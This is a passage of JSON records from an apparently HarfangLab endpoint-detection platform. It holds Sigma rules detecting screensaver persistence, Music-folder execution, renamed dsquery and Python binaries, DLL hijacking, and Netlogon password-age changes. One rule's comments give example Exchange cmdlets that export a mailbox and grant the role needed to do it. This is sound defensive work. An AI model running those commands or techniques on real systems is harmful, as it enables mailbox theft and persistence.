"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073993Z",
"creation_date": "2026-03-23T11:45:34.073995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073999Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/09/persistence-screensaver/",
"https://attack.mitre.org/techniques/T1546/002/"
],
"name": "t1546_002_suspicious_screensaver_execution.yml",
"content": "title: Suspicious Execution Related to Screensaver\nid: 5db05080-c59d-44b1-8530-0b311ce322d2\ndescription: |\n Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\n Usually, this type of file is located in 'C:\\Windows\\System32\\' or 'C:\\Windows\\SysWOW64\\' and this program is executed after a configurable time of user inactivity.\n Attackers can establish persistence via a modification of the registry 'HKCU\\Control Panel\\Desktop\\SCRNSAVE.exe' key.\n It is recommended to perform a static analysis of the .scr file to check its legitimacy.\nreferences:\n - https://pentestlab.blog/2019/10/09/persistence-screensaver/\n - https://attack.mitre.org/techniques/T1546/002/\ndate: 2022/02/15\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|endswith: '.scr'\n CommandLine|startswith: '?:\\'\n ParentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\SysWOW64\\winlogon.exe'\n\n filter_system:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n exclusion_netpresenter:\n ProcessProcessName:\n - 'NETPRE~1.SCR'\n - 'Netpresenter.scr'\n ProcessSigned: 'true'\n ProcessSignature: 'Netpresenter B.V.'\n\n exclusion_netpresenter_unsigned:\n ProcessProcessName:\n - 'NETPRE~1.SCR'\n - 'Netpresenter.scr'\n ProcessSha256: 'f0e9a4bf3a12e67afedb714909c009453ba326414ebf3b3d6ae63375144335fd'\n\n exclusion_maincare:\n ProcessCompany: 'Maincare Solutions'\n ProcessProduct: 'M-CrossWay'\n ProcessInternalName: 'ScreenSaver.exe'\n\n exclusion_asus_oled_care:\n ProcessProcessName: 'OLED Care Screensaver.scr'\n ProcessSigned: 'true'\n ProcessSignature: 'ASUSTeK COMPUTER INC.'\n\n exclusion_wlx_photo_gallery:\n ProcessProcessName: 'WLXPGSS.SCR'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrsaver.scr'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_ribbons:\n ProcessOriginalFileName: 'Ribbons'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_known_fp:\n ProcessSha256:\n # earth.Scr\n - 'ccdeb6da84164241cc30cbb36d21d9a152b5b1b0e1a067ad1d18665b413cae0b'\n # Fliqlo.scr\n - '2e0a46b385f21c081f69c940bf850656538a43dd8a1860093b88737f4ff82f8d'\n # Lively.Screensaver.dll\n - '7bc1378daf1ce8fad87055f87be8dd50d82755e11bf1744acc2987005370ab4d'\n # System47.scr\n - '6e773909911aadef994984b399d833f0796295e7085984c2fb6f42e09afa7a05'\n # matrix.scr\n - '18973bf33a9ec9ed53dd30b634aec0a4e30af66f3fcba9e2e0df6d47d2f83b6d'\n # Lagoon32.scr\n - '4abcd75331d262de96fe4b96c40bae8c8f0f07e33238498c88cd8540c932b09a'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5db05080-c59d-44b1-8530-0b311ce322d2",
"rule_name": "Suspicious Execution Related to Screensaver",
"rule_description": "Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\nUsually, this type of file is located in 'C:\\Windows\\System32\\' or 'C:\\Windows\\SysWOW64\\' and this program is executed after a configurable time of user inactivity.\nAttackers can establish persistence via a modification of the registry 'HKCU\\Control Panel\\Desktop\\SCRNSAVE.exe' key.\nIt is recommended to perform a static analysis of the .scr file to check its legitimacy.\n",
"rule_creation_date": "2022-02-15",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5dbcadc4-da72-48c9-a11b-ab50099649cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070393Z",
"creation_date": "2026-03-23T11:45:34.070395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070399Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_execution_from_music_folder.yml",
"content": "title: Execution from Music Folder\nid: 5dbcadc4-da72-48c9-a11b-ab50099649cb\ndescription: |\n Detects a suspicious execution from Music folder.\n Attackers may try to use the Music folder to hold their tools or malware because it is an uncommon directory that will often not be seen by users.\n It is recommended to analyze the parent and child processes to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\Users\\\\*\\Music\\'\n\n exclusion_musicbee:\n Image|endswith: '\\MusicBee\\MusicBee.exe'\n Company: 'Steven Mayall'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5dbcadc4-da72-48c9-a11b-ab50099649cb",
"rule_name": "Execution from Music Folder",
"rule_description": "Detects a suspicious execution from Music folder.\nAttackers may try to use the Music folder to hold their tools or malware because it is an uncommon directory that will often not be seen by users.\nIt is recommended to analyze the parent and child processes to look for malicious content or actions.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5dc806ff-858d-4f1c-914c-39992ff6162f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605464Z",
"creation_date": "2026-03-23T11:45:34.605468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605475Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN",
"https://www.mandiant.com/resources/blog/apt41-us-state-governments",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1087_002_dsquery_renamed.yml",
"content": "title: Suspicious Renamed or Moved Dsquery Tool Executed\nid: 5dc806ff-858d-4f1c-914c-39992ff6162f\ndescription: |\n Detects the execution of the renamed Dsquery tool which is a command-line tool that may be present on some Windows Server.\n Dsquery is a Windows legitimate binary that can be used to query an Active Directory to gather informations.\n This tool is often used by attackers during the discovery phase.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN\n - https://www.mandiant.com/resources/blog/apt41-us-state-governments\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.defense_evasion\n - attack.t1036.003\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Dsquery\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dsquery.exe'\n\n filter_name:\n Image|endswith: '\\dsquery.exe'\n\n filter_path:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5dc806ff-858d-4f1c-914c-39992ff6162f",
"rule_name": "Suspicious Renamed or Moved Dsquery Tool Executed",
"rule_description": "Detects the execution of the renamed Dsquery tool which is a command-line tool that may be present on some Windows Server.\nDsquery is a Windows legitimate binary that can be used to query an Active Directory to gather informations.\nThis tool is often used by attackers during the discovery phase.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1036.003",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e396487-729d-4967-a04b-00d5f7fd4ddd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592456Z",
"creation_date": "2026-03-23T11:45:34.592460Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerwizardelev.yml",
"content": "title: DLL Hijacking via BitLockerWizardElev.exe\nid: 5e396487-729d-4967-a04b-00d5f7fd4ddd\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizardElev.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizardElev.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e396487-729d-4967-a04b-00d5f7fd4ddd",
"rule_name": "DLL Hijacking via BitLockerWizardElev.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizardElev.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e3aa973-aa80-4aab-bd67-4ab462e4221c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607372Z",
"creation_date": "2026-03-23T11:45:34.607375Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607382Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1114/002/"
],
"name": "t1059_001_powershell_suspicious_exchange_cmdlets.yml",
"content": "title: Suspicious Microsoft Exchange Cmdlet via PowerShell\nid: 5e3aa973-aa80-4aab-bd67-4ab462e4221c\ndescription: |\n Detects the usage of suspicious Exchange PowerShell cmdlets.\n New-ManagementRoleAssignment can be used to assign a management role to a user and can be abused to add the Mailbox Import Export role in order to export a specific mailbox.\n New-MailboxExportRequest can be used to export contents of a mailbox to a .pst file.\n These cmdlets can be abused by attackers in order to exfiltrate users mailbox.\n It is recommended to analyze the mailbox export requests for legitimacy, monitor for mailbox activities, and further investigate other alerts and telemtry on the endpoint.\nreferences:\n - https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell\n - https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps\n - https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1114/002/\ndate: 2021/11/09\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_export:\n # New-MailboxExportRequest -Mailbox toto -FilePath C:\\Windows\\Temp\\backup.pst\n PowershellCommand|contains|all:\n - 'New-MailboxExportRequest '\n - ' -Ma'\n\n selection_role:\n # New-ManagementRoleAssignment -Role \"Mailbox Import Export\" -User \"toto\"\n PowershellCommand|contains|all:\n - 'New-ManagementRoleAssignment '\n - ' -Ro'\n\n exclusion_exchange:\n PowershellCommand|contains|all:\n - '# O15# 2844081 - Create PartnerApplication ?Exchange Online? in DC and On-Premise'\n - '# Create application account for Exchange'\n - 'New-ManagementRoleAssignment -Role $roleName -User $appAccount.Identity -DomainController $RoleDomainController;'\n\n exclusion_fsecure:\n PowershellCommand|contains|all:\n - '# Synopsis: This script performs F-Secure Transport Agent registration/unregistration.'\n - 'New-ManagementRoleAssignment -Name:\"F-Secure On-Demand Scanner\" -SecurityGroup:\"Exchange Servers\"'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e3aa973-aa80-4aab-bd67-4ab462e4221c",
"rule_name": "Suspicious Microsoft Exchange Cmdlet via PowerShell",
"rule_description": "Detects the usage of suspicious Exchange PowerShell cmdlets.\nNew-ManagementRoleAssignment can be used to assign a management role to a user and can be abused to add the Mailbox Import Export role in order to export a specific mailbox.\nNew-MailboxExportRequest can be used to export contents of a mailbox to a .pst file.\nThese cmdlets can be abused by attackers in order to exfiltrate users mailbox.\nIt is recommended to analyze the mailbox export requests for legitimacy, monitor for mailbox activities, and further investigate other alerts and telemtry on the endpoint.\n",
"rule_creation_date": "2021-11-09",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1114.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e50f425-f3e4-4ba5-b72b-63c61ea844e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087811Z",
"creation_date": "2026-03-23T11:45:34.087815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087820Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059.006/"
],
"name": "t1059_006_renamed_python_executable.yml",
"content": "title: Renamed Python Binary Executed\nid: 5e50f425-f3e4-4ba5-b72b-63c61ea844e5\ndescription: |\n Detects the execution of a renamed Python executable.\n Adversaries may rename Python binaries to mimic legitimate processes to avoid detection.\n It is recommended to investigate the renamed executable's behavior, verify its legitimacy, and review processes for unusual activities.\nreferences:\n - https://attack.mitre.org/techniques/T1059.006/\ndate: 2023/10/31\nmodified: 2026/03/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.Python\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName:\n - 'python.exe'\n - 'pythonw.exe'\n - 'py.exe'\n\n filter_legitimate:\n Image|endswith:\n - '\\python*.exe'\n - '\\pip*.exe'\n - '\\idle*.exe'\n - '\\py.exe'\n - '\\pyw.exe'\n\n exclusion_dwagent:\n Image|endswith: '\\dwagent.exe'\n\n exclusion_waptpython:\n Image:\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files\\wapt\\waptpython.exe'\n - '?:\\wapt\\waptpython.exe'\n\n exclusion_waptpythonw:\n - Image|endswith: '\\wapt\\waptpythonw.exe'\n CommandLine: '*\\wapt\\waptpythonw.exe *\\wapt\\wapt-get.py session-setup all'\n - Image: '?:\\Program Files (x86)\\wapt\\waptpythonw.exe'\n\n exclusion_quantumatk:\n Image: '?:\\Program Files\\QuantumATK\\QuantumATK-*\\bin\\quantumatk.exe'\n\n exclusion_bmcsoftware:\n Image: '?:\\Program Files\\BMC Software\\Discovery Outpost\\outpostworker.exe'\n exclusion_automai:\n Image: '?:\\Automai\\Director\\WebServ\\bin\\Py\\Scripts\\\\*.exe'\n\n exclusion_virtualenvs:\n Image|endswith: 'virtualenvs\\\\*\\Scripts\\python3'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e50f425-f3e4-4ba5-b72b-63c61ea844e5",
"rule_name": "Renamed Python Binary Executed",
"rule_description": "Detects the execution of a renamed Python executable.\nAdversaries may rename Python binaries to mimic legitimate processes to avoid detection.\nIt is recommended to investigate the renamed executable's behavior, verify its legitimacy, and review processes for unusual activities.\n",
"rule_creation_date": "2023-10-31",
"rule_modified_date": "2026-03-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e5224bd-6c47-4a50-8706-a614438c7c55",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621615Z",
"creation_date": "2026-03-23T11:45:34.621617Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621622Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/maximum-password-age",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1098_maximum_netlogon_password_changes.yml",
"content": "title: Maximum Automatic Machine Account Password Age Changed\nid: 5e5224bd-6c47-4a50-8706-a614438c7c55\ndescription: |\n Detects a registry modification changing the maximum password age on the local host.\n Attackers may try to change such settings to reduce scope of an existing hardening and to maintain access as long as possible.\n It is recommended to analyze the process responsible for this registry edit as well as to look for malicious actions by the same user around the alert.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/maximum-password-age\n - https://attack.mitre.org/techniques/T1098/\ndate: 2020/10/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Netlogon\\Parameters\\MaximumPasswordAge'\n\n filter_short_password_age:\n # Image: 'C:\\Windows\\System32\\services.exe' # if set by a 3rd party softare, wouldn't match\n Details:\n # the reasoning here is, an attacker would probably set this to a high value (365 days or more?)\n # 0 to 95 days (some companies have a password policy set to 90 days and set the same LAPS password age)\n - 'DWORD (0x0000000?)' # 0-15 days\n - 'DWORD (0x0000001?)' # 16-31 days\n - 'DWORD (0x0000002?)' # 32-47 days\n - 'DWORD (0x0000003?)' # 48-63 days\n - 'DWORD (0x0000004?)' # 64-79 days\n - 'DWORD (0x0000005?)' # 80-95 days\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e5224bd-6c47-4a50-8706-a614438c7c55",
"rule_name": "Maximum Automatic Machine Account Password Age Changed",
"rule_description": "Detects a registry modification changing the maximum password age on the local host.\nAttackers may try to change such settings to reduce scope of an existing hardening and to maintain access as long as possible.\nIt is recommended to analyze the process responsible for this registry edit as well as to look for malicious actions by the same user around the alert.\n",
"rule_creation_date": "2020-10-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1098",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e67f495-82f8-4ec4-8384-c59ee7db5876",
